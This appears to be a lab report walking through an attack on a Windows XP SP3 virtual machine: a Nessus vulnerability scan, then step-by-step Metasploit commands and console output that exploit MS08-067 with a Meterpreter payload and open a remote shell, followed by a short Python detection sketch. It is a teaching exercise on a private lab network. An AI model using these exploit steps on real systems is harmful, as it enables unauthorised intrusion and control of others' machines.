Exploiting a Windows XP Machine
A. Vulnerability Assessment
- Open the Windows XP SP3 virtual machine again and type "ipconfig" to find its IP address.
- Open a terminal and type "ifconfig" to find the IP address of the host (BackTrack).
- Open Nessus and log in.
- Choose the Scans menu and click Add.
- Enter the name, type, policy and scan targets.
- Download the report after the scan completes.
PLUGIN ID# | # | PLUGIN NAME | SEVERITY
35362 | 1 | MS09-001: Microsoft Windows SMB Vulnerabilities Remote Code Execution (958687) (uncredentialed check) | High Severity problem(s) found
34477 | 1 | MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution (958644) (uncredentialed check) | High Severity problem(s) found
57608 | 1 | SMB Signing Disabled | Medium Severity problem(s) found
26920 | 1 | Microsoft Windows SMB NULL Session Authentication | Medium Severity problem(s) found
11011 | 2 | Microsoft Windows SMB Service Detection | Low Severity problem(s) found
54615 | 1 | Device Type | Low Severity problem(s) found
45590 | 1 | Common Platform Enumeration (CPE) | Low Severity problem(s) found
35716 | 1 | Ethernet Card Manufacturer Detection | Low Severity problem(s) found
26917 | 1 | Microsoft Windows SMB Registry : Nessus Cannot Access the Windows Registry | Low Severity problem(s) found
25220 | 1 | TCP/IP Timestamps Supported | Low Severity problem(s) found
19506 | 1 | Nessus Scan Information | Low Severity problem(s) found
11936 | 1 | OS Identification | Low Severity problem(s) found
11197 | 1 | Multiple Ethernet Driver Frame Padding Information Disclosure (Etherleak) | Low Severity problem(s) found
10884 | 1 | Network Time Protocol (NTP) Server Detection | Low Severity problem(s) found
10785 | 1 | Microsoft Windows SMB NativeLanManager Remote System Information Disclosure | Low Severity problem(s) found
10394 | 1 | Microsoft Windows SMB Log In Possible | Low Severity problem(s) found
10287 | 1 | Traceroute Information | Low Severity problem(s) found
10150 | 1 | Windows NetBIOS / SMB Remote Host Information Disclosure | Low Severity problem(s) found
10114 | 1 | ICMP Timestamp Request Remote Date Disclosure | Low Severity problem(s) found
B. Exploit
1. Open the console and type: msfconsole
root@BT:~# msfconsole
       =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 787 exploits - 425 auxiliary - 128 post
+ -- --=[ 238 payloads - 27 encoders - 8 nops
       =[ svn r14551 updated 14 days ago (2012.01.14)
Warning: This copy of the Metasploit Framework was last updated 14 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
2. I search the Framework for the MS08-067 NetAPI exploit.
msf > search ms08_067_netapi
Matching Modules
================
   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Microsoft Server Service Relative Path Stack Corruption
3. After finding the exploit, I type:
msf > use windows/smb/ms08_067_netapi
4. Next, I set the payload to the Windows-based Meterpreter bind_tcp, which, if successful, will start a connection on the target and connect back to the attacking machine.
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
5. Type show targets to identify the system you want to target.
msf exploit(ms08_067_netapi) > show targets
Exploit targets:
   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   10  Windows 2003 SP1 Japanese (NO NX)
   11  Windows 2003 SP2 English (NO NX)
   12  Windows 2003 SP2 English (NX)
   13  Windows 2003 SP2 German (NO NX)
   14  Windows 2003 SP2 German (NX)
   15  Windows XP SP2 Arabic (NX)
   16  Windows XP SP2 Chinese - Traditional / Taiwan (NX)
   17  Windows XP SP2 Chinese - Simplified (NX)
   18  Windows XP SP2 Chinese - Traditional (NX)
   19  Windows XP SP2 Czech (NX)
   2   Windows XP SP0/SP1 Universal
   20  Windows XP SP2 Danish (NX)
   21  Windows XP SP2 German (NX)
   22  Windows XP SP2 Greek (NX)
   23  Windows XP SP2 Spanish (NX)
   24  Windows XP SP2 Finnish (NX)
   25  Windows XP SP2 French (NX)
   26  Windows XP SP2 Hebrew (NX)
   27  Windows XP SP2 Hungarian (NX)
   28  Windows XP SP2 Italian (NX)
   29  Windows XP SP2 Japanese (NX)
   3   Windows XP SP2 English (AlwaysOn NX)
   30  Windows XP SP2 Korean (NX)
   31  Windows XP SP2 Dutch (NX)
   32  Windows XP SP2 Norwegian (NX)
   33  Windows XP SP2 Polish (NX)
   34  Windows XP SP2 Portuguese - Brazilian (NX)
   35  Windows XP SP2 Portuguese (NX)
   36  Windows XP SP2 Russian (NX)
   37  Windows XP SP2 Swedish (NX)
   38  Windows XP SP2 Turkish (NX)
   39  Windows XP SP3 Arabic (NX)
   4   Windows XP SP2 English (NX)
   40  Windows XP SP3 Chinese - Traditional / Taiwan (NX)
   41  Windows XP SP3 Chinese - Simplified (NX)
   42  Windows XP SP3 Chinese - Traditional (NX)
   43  Windows XP SP3 Czech (NX)
   44  Windows XP SP3 Danish (NX)
   45  Windows XP SP3 German (NX)
   46  Windows XP SP3 Greek (NX)
   47  Windows XP SP3 Spanish (NX)
   48  Windows XP SP3 Finnish (NX)
   49  Windows XP SP3 French (NX)
   5   Windows XP SP3 English (AlwaysOn NX)
   50  Windows XP SP3 Hebrew (NX)
   51  Windows XP SP3 Hungarian (NX)
   52  Windows XP SP3 Italian (NX)
   53  Windows XP SP3 Japanese (NX)
   54  Windows XP SP3 Korean (NX)
   55  Windows XP SP3 Dutch (NX)
   56  Windows XP SP3 Norwegian (NX)
   57  Windows XP SP3 Polish (NX)
   58  Windows XP SP3 Portuguese - Brazilian (NX)
   59  Windows XP SP3 Portuguese (NX)
   6   Windows XP SP3 English (NX)
   60  Windows XP SP3 Russian (NX)
   61  Windows XP SP3 Swedish (NX)
   62  Windows XP SP3 Turkish (NX)
   63  Windows 2003 SP2 Japanese (NO NX)
   7   Windows 2003 SP0 Universal
   8   Windows 2003 SP1 English (NO NX)
   9   Windows 2003 SP1 English (NX)
6. I then set the target to Windows XP SP3 English (AlwaysOn NX).
msf exploit(ms08_067_netapi) > set target 5
target => 5
7. Next, I set the IP address of our target machine, which is vulnerable to the MS08-067 exploit, by defining the RHOST value.
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
8. Type: set LHOST "IP address of the attacking machine"
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.100
LHOST => 192.168.56.100
9. Set the LPORT option, which specifies the port on which our attacker machine will listen for a connection from our target.
msf exploit(ms08_067_netapi) > set LPORT 8080
LPORT => 8080
10. Enter show options to make sure that the options are set up correctly.
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.56.101   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/bind_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LPORT     8080             yes       The listen port
   RHOST     192.168.56.101   no        The target address
Exploit target:
   Id  Name
   --  ----
   5   Windows XP SP3 English (AlwaysOn NX)
11. Type exploit, which initiates our exploit and attempts to attack the target.
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:48149 -> 192.168.56.101:8080) at 2012-01-28 01:07:04 +0700
12. Finally, type shell to drop into an interactive command shell on the target.
meterpreter > shell
Process 1172 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
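From the defender's side, the session line in step 11 is the observable event: a connection from 192.168.56.1 to port 8080 on the XP host right after traffic to its SMB port 445. The Python sketch below is an added example, not part of the original post, that flags that pattern in flow records; the sample records, the expected-port list and the 30-second window are assumptions constructed for illustration.

```python
from datetime import datetime, timedelta

# Constructed flow records (timestamp, src, dst, dst_port), modelled on the
# addresses and ports in the walkthrough above; this is not captured traffic.
SAMPLE_FLOWS = [
    ("2012-01-28 01:06:10", "192.168.56.20", "192.168.56.101", 445),
    ("2012-01-28 01:07:02", "192.168.56.1", "192.168.56.101", 445),
    ("2012-01-28 01:07:04", "192.168.56.1", "192.168.56.101", 8080),
    ("2012-01-28 01:20:00", "192.168.56.20", "192.168.56.101", 3389),
]

# Assumption: ports this workstation is expected to accept connections on.
EXPECTED_PORTS = {135, 139, 445, 3389}


def find_bind_sessions(flows, expected_ports=EXPECTED_PORTS, window_s=30):
    """Flag inbound connections to an unexpected port that follow an SMB
    connection from the same source to the same host within window_s."""
    window = timedelta(seconds=window_s)
    last_smb = {}  # (src, dst) -> time of the most recent connection to 445
    alerts = []
    parsed = sorted(
        (datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), src, dst, port)
        for ts, src, dst, port in flows
    )
    for when, src, dst, port in parsed:
        if port == 445:
            last_smb[(src, dst)] = when
        elif port not in expected_ports:
            smb_time = last_smb.get((src, dst))
            if smb_time is not None and when - smb_time <= window:
                alerts.append({
                    "src": src, "dst": dst, "port": port,
                    "delay_s": int((when - smb_time).total_seconds()),
                })
    return alerts


if __name__ == "__main__":
    for alert in find_bind_sessions(SAMPLE_FLOWS):
        print(alert)
```

The same correlation can be run over firewall or NetFlow exports; on a host where MS08-067 (958644) is patched and inbound ports are filtered, the second connection never appears.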
Where is the IG in your report? Do you remember the pyramid phase? Please edit your report!
-=IS2C=-